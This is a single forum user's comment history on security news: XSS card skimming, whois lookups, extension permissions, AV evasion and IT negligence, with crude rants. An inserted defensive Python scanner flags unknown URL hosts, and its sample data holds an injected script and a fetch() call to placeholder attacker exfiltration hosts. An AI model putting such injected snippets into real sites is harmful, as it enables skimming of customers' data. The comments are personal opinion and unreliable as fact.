Re: Content Security Policy
Thanks for the shout, I was a C, I am now A
Beers all round
317 posts • joined 30 Oct 2015
This is clientside
With the way the world is going with CDNs serving god knows what, can you imagine end-users running outbound default DROP policies in their firewalls?
I tried that once a long time ago, and it was annoying then; this was before CDNs started becoming the norm
I'll be honest, XSS is a little confusing for me; there is non-persistent and persistent XSS
This was a persistent XSS attack, so they would have had to store their code somewhere, DB?
To get their code on there, they are probably exploiting either some unpatched or 0day vuln or SQL injection, but I am just guessing here
I'm purely going by the information in this screenshot
This was a persistent XSS attack AFAIK, some banks do carry out ad-hoc security checks for unusual transactions, for example phoning the customer. There is no ability as of yet to enter a 2FA OTP into a POS terminal
I fail to see how a bank can mitigate the failing of a separate business in securing their website, especially one which allows for financial data to be inputted. A better solution would have been for the compromised business to have at least some inkling of what is going on in their infrastructure, but that costs money for staff to implement and carry out such a task. Unfortunately these businesses love money too much and don't want to properly invest in security
I have my own website, and while it's not the most complicated by any means, I know every single bit of code that's on there; can these businesses say the same about their websites?
One possible solution would be to cronjob a script which searches their DBs and code for :// and reports back what it finds, but for that to work, they have to at the very least know what their estate looks like
I've seen this kind of clusterfuck before at a company I worked for briefly: they had no 2FA on their registrar account but had a DNS record pointing vpn.TLD.com to an IP address which was a GoDaddy shared hosting webserver in the USA which had something like 2,000 websites when checking reverse IP, and they didn't have any offices in that region. Think about it: no 2FA on the registrar account, VPN pointing to shared hosting websites, in a country where they didn't have any presence. When I asked about it, nobody knew what it was. This company was a joke and was run by jokers
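One way to implement the scan described in this post, as an added example that is not from the original comment: it flags every `://` (and scheme-relative `//`) reference whose host is not on an allowlist the site operator maintains. The allowlist, host names and sample records are constructed placeholders.

```python
import re
from typing import Iterable

# Hypothetical allowlist: hosts the site operator knows it legitimately loads content from.
KNOWN_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# Optional scheme, then "//", then a host. Scheme-relative URLs ("//host/x") are caught too.
# A JS comment like "// text" does not match because a space follows the slashes;
# "//word" with no space would be reported as a host and needs a manual look.
URL_RE = re.compile(r"(?:[a-z][a-z0-9+.-]*:)?//([a-z0-9.-]+)", re.I)


def find_unknown_hosts(text: str, known_hosts=KNOWN_HOSTS) -> set[str]:
    """Return hosts referenced by URLs in `text` that are not on the allowlist."""
    found = {m.group(1).lower() for m in URL_RE.finditer(text)}
    return found - {h.lower() for h in known_hosts}


def scan_records(records: Iterable[tuple[str, str]], known_hosts=KNOWN_HOSTS) -> dict[str, set[str]]:
    """`records` are (label, content) pairs: a file path and its text, or a DB row id and its value.
    Returns {label: unknown hosts} for every record that points somewhere off the allowlist."""
    report = {}
    for label, content in records:
        unknown = find_unknown_hosts(content, known_hosts)
        if unknown:
            report[label] = unknown
    return report


# Constructed sample records standing in for a checkout template and two CMS settings rows.
SAMPLE_RECORDS = [
    ("templates/checkout.html",
     '<script src="https://cdn.example-shop.test/checkout.js"></script>\n'
     '<script src="//collector.attacker-placeholder.test/stats.js"></script>'),
    ("db.cms_settings.row_42",
     'footer_html = <a href="https://www.example-shop.test/about">About</a>'),
    ("db.cms_settings.row_43",
     "analytics_snippet = <script>fetch('https://exfil.attacker-placeholder.test/c')</script>"),
]

if __name__ == "__main__":
    # Run from cron and mail this output to whoever owns the estate.
    for label, hosts in scan_records(SAMPLE_RECORDS).items():
        print(f"{label}: {', '.join(sorted(hosts))}")
```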
Looking at the whois data for that domain (new egg stats.com), it was created 13/08/2018. I suspect it's not owned by NewEgg, and was registered by the crims, via a company in Panama no less, that place where all the criminals stash their ill-gotten gains
I did a whois on (new egg stats.com) out of curiosity; it's been registered through a 3rd party, "WhoisGuard Protected", based in that bastion of criminals, Panama
Is this a national service that Panama offers, protecting criminals?
I wonder what the words are to their national anthem
It seems part of the chorus goes like this:
"It is necessary to cover with a veil from the past"
Another money-hoarding sociopath opens their mouth
“I want more money, whaaaaa”
These people literally feel no shame about their greed
There are more around than you think there are, and they're usually more successful in life than non-sociopaths, and they breed
I ran pi-hole for a while; I found it to be really buggy and was a little concerned it was running as root, considering the amount of bugginess I experienced
I call it muppetry
“After several hours, Joe finally gave up on logic and reason, and simply told the cabinet that he could talk to plants and that they wanted water.”
This add-on can:
Access your data for all websites
Access browser tabs
"There is one permission in particular, “Access your data for all websites”, that we’ve gotten many questions about since the feature launched. The reason why it’s worded this way is because a web page can contain virtually anything, and some extensions need to read everything on it in order to perform an action based on what the page contains.
For example, an ad blocker needs to read all web page content to identify and remove ad code. A password manager needs to detect and write to username and password fields. A shopping extension might need to read details of the products you’re searching for.
Since these types of extensions wouldn’t know whether any particular web page contains the bit it needs to modify until it’s loaded, and neither does Firefox, it needs access to everything on a page so it can look for and modify the appropriate parts. This means that in theory, while rare, a malicious developer could tell you their extension does one thing while it actually does something else."
Thankfully, most people in this world are honest and upright. Unfortunately, a disingenuous monetary system means sometimes people will be tempted to defraud others.
Too many companies rely heavily on their single antivirus offering and think that just because it's reported a binary as clean, it is actually clean of malicious code. The number of times I have uploaded binaries that have been downloaded from official websites to VirusTotal and found them to be compromised is growing.
I only have to give the example of Shellter to prove my point; I've used this and tested it against Security Essentials and others, and they do not fare well in detections
When you think you know everything, you're never going to improve your learning
I know I am smart, because I know I know nothing
“Use it to enforce the basics such as mandating a six-digit unlock code that has to be changed regularly”
I thought we'd moved on from that outdated advice of making end-users change credentials often?
Well the likes of Pornhub don't seem to do age checks on user-submitted content
Not sure what is worse, children watching porn or children getting paid to do porn
"Further, the process of transformation, even if it brings revolutionary change, is likely to be a long one, absent some catastrophic and catalyzing event – like a new Pearl Harbor." - PNAC
Well Cisco certainly is on a Killing Spree™
Killing security that is...
"Why didn't Cisco pick up these vulnerabilities in the testing and debugging stage of these security devices"
Because doing the right thing is inherently opposed to the capitalist model; doing what profits is the only way in this economic model.
I'm giving humanity a confident and generous 10 years left on this rock before it burns
This is no different from those dickheads at M$ deciding their users don't need to see the file extensions, spawning all kinds of trickery, for example providing a file called evil.txt.exe and including a text file icon in the exe to convince users further that it is a text file
There is an unspecified prize for anyone who can figure out the thinking behind this.
Did you really just use the words intelligence and military in the same sentence?
"a section titled “Umbrage” that details the CIA’s ability to impersonate cyber-attack techniques used by Russia and other nation states."
Apparently, Eternal Blue was "stolen"
That's the best alibi ever, my dog ate my hacking tool and shat it out in NK
I found the 2hr+ podcast far more interesting than the brief toke on the spliff
To be fair, Thailand is a magnet for paedos, and just because he has a wife, it doesn't mean he isn't a paedo
Hopefully a PI is looking into this
Sometimes people just give you the creeps, and I suspect this guy gave Elon the creeps.
Do you mind telling the TV licensing gang of that little detail?
They seem to equate "no tv license" with "they need a tv license" irrespective of how someone uses their TV
Anybody who disbelieves this, I highly recommend you cancel your TV license, remove all BBC channels from your tuned TV, and then watch the highly threatening letters roll in from the BBC TV licensing gang.
By all means vote down, it won't change this little fact
No idea why you have so many downvotes.
The BBC are happy enough to pay Gary Lineker, Chris Evans and Graham Norton, a ridiculous sum of cash for what is questionable talent.
If anybody has seen Idiocracy, it should be fairly obvious why TV is the way it is
Celebrity get me out of here?
If these programs are not the result of an ever increasingly stupid population, I don't know what it
Well, from my observation many of the university types do certainly think that once they've completed their degree, the learning is done and finished, and they can then start looking down their noses at us other self-educated types who didn't pay £9k PA for a "rarely present tutor" and are interested enough in the subject to be motivated to self-learn
I guess the overpriced degrees in university breed a kind of hubristic elitism
A bit like when people buy an overpriced product, and they wrongly equate high price with high quality
“The good work for all education is interest. Until there is interest there is no response"
Do you get paid enough though, for said misery?
By hacking crew, you surely mean scriptkiddy crew
Not sure why Minecraft is even mentioned, except to give it a bad name by associating it with this moron's antics. Feuds happen in lots of different games, sometimes resulting in swatting. The games are not at fault; it's the low-IQ idiots playing them with no idea how to behave in a society, that's the problem!
Are you sure that photo was taken when he was an adult?
He looks about 12
But I.T is a utility, like a toilet
When companies employ IT staff, in their minds, they're employing janitors
“is it really worth spending that many millions of pounds on 5G?”
But, but... SHINY!!
The Greek "gymnasein" (to train naked)
This is interesting, and my next visit to the gym will be too
Good luck trying to convince people to use 2FA; most people don't like to be inconvenienced and they get quite angry if something doesn't work in the way they demand
You only have to look at how many people pick bad passwords and recycle them across multiple websites, or increment them with number suffixes
Surely this is just technological natural selection and we should just let it run its course.
The result is, we will be left with fewer muppets and then it won't be such an uphill struggle, and IT admins will have to spend less time pissing into the wind
Pull the other one
Junk phone more like it, with added crAppstore
Install NoScript (be selective about which domains you allow; if a website doesn't work without scripting enabled on the TLD you're visiting, go elsewhere)
Delete cookies upon browser closing
Don't install Flash
There are other ways and means of tracking such as screen resolution, user-agent string, the list is quite long, but enough of these datasets creates a fairly unique fingerprint.
I wish I could transport back to the nineties, the internet was so much better then, before it became commercial
Which is running as root
Well someone has to beta test these software houses' untested code; it might as well be criminals if not the companies, who should show some responsibility for it
Hopefully some of their antics will deny CEOs their grotesque salaries
Unlikely though, these sociopaths usually have golden goodbyes, unlike the fixed-term contractors who just get shafted.
Have you tried employing more staff?
What my experience (20 years) of working in the IT industry has shown me, is that company bosses don't like to invest in staff, they would rather have their 4 holidays a year than actually run a company with a full deck, it seems the skeleton crew is the norm these days.
I despair too, because most of these organisations I have had the sad opportunity to experience, have made me facepalm endlessly to the point my forehead is bruised.
1. A Managed services company used a common password to access customer machines (password-01)
2. The owner of the said Managed Services company didn't even know what the WEEE directive was after I told him he couldn't just throw electronics into the normal bin
3. A technology manufacturer who developed a web app to work with their devices, had a support account which would obviously be easily guessed and the password was the same as the username
4. A telecommunications company used 'folder redirection' in their domain policy, but the folder permissions were incorrectly set to Full permissions for Everyone, meaning everyone in the company could read and write every other employee's desktop folders, My Documents, etc. This company wanted to be ISO 27001 accredited. Bwaaahahahaha
5. I once started at a company and was handed a laptop that had not been wiped since the previous owner. I asked for an ISO from MSDN and was told there weren't any available, and that he had a disc at home; I asked if it was from MSDN, and he said he "thought so", but wasn't sure
6. Same company, was not given a deskphone, and was told to order one from Ebay and claim it on expenses!
I could go on and on and on and on and on and on, about the clusterfuck that is, IT management
Cisco should have a sniff around their own firmware binaries, it seems someone in their organisation keeps adding in back doors to their router firmwares
I bet they outsourced their IT to some Managed Services outfit who are themselves "Managing" about 30 other companies' IT systems with 3 members of staff.
But the upshot of this, is that the CEO, executives and shareholders received huge salaries / bonuses / dividends.
Business as usual...
The Internet of Shit™ strikes again
It seems no company is afraid of distributing shit and poorly tested code to their customers, be it Belkin, Samsung, Cisco, Draytek, my list could quite possibly be endless
I bet their profits are looking great though, the CEO and shareholders enjoying huge payouts
If only they invested more in testing and security, if only...
Maybe a law is needed, am I being too preemptive here?
So I’m just gonna say, HSTS preload
Maybe a software license is needed, I know this has been suggested before
I mean, I reckon I could have a go at driving a HGV and it will all work out ok
(I dont have a HGV license BTW)
"you can't say the same for any general-purpose OS"
Ok fair points, my analogy probably isn't the best. But still, the point I was trying to express is that of lives being lost due to poor cultural practices. It's become a common and normal practice to patch "bugs"; let's be clear here, they are blunders and we should refer to them as such. Some of these blunders result in serious harm.
At what stage in our technological development do we stop and say enough is enough, this shit needs to be properly framed into best practices and enshrined in law? Companies are profiting from their shonky untested code, and we will start seeing it costing people's lives.
Have company executives gone to jail because of negligence?
Could we see technology company executives going to jail because of negligence?
I hope so
The term zero-day for the most part means what you think it means, unknown to anti-virus definitions for example
But there can be "in the wild" zero-day exploits, meaning they are actively being exploited, but not sufficiently protected against. They are however still zero-days, but hopefully not zero-days for long.
Hope that makes sense
"I suspect that over time legal interpretation might change as software finds its way into more and more products and the difference hardware and software blurs, but at the moment that is the case."
I honestly think this idea needs to speed up. Too many software houses are pushing out shit (not properly reviewed / tested) code and expecting the public / customers to simply accept this as the status quo. Would we accept this level of ineptitude in the physical world? Absolutely not!
Can you imagine it, a bridge gets built, but then needs to be closed 18 thousand times for patches
When (and some might argue this is now) poorly coded software starts affecting people's lives, there needs to be some accountability for shonky, sloppy coding; simply putting in a user license agreement saying you are not responsible for jack shit is not good enough anymore
If your software needs to be patched time and time again, and then some more, you need to take an introspective look at your software development cycle; perhaps not enough money is being invested in the testing phase and as a company you have decided to kick that particular conundrum down the path
I should mention the Tesla (BETA) autopilot which had a disclaimer to the driver that if they enabled it they acknowledged it was still BETA and accepted the risks with no liability to Tesla.
What the actual fuck, what choice did other road users get?
This is the kind of "we're not responsible" malarkey that needs to fucking change
Honestly, when you have a government which doesn't know the difference between a hashtag and hashing, what chance do we have of a government properly legislating for this technological clusterfuck waiting to happen? I'm no luddite but some people need to wake up and smell the impending technological singularity, before it's too late
Biting the hand that feeds IT © 1998–2018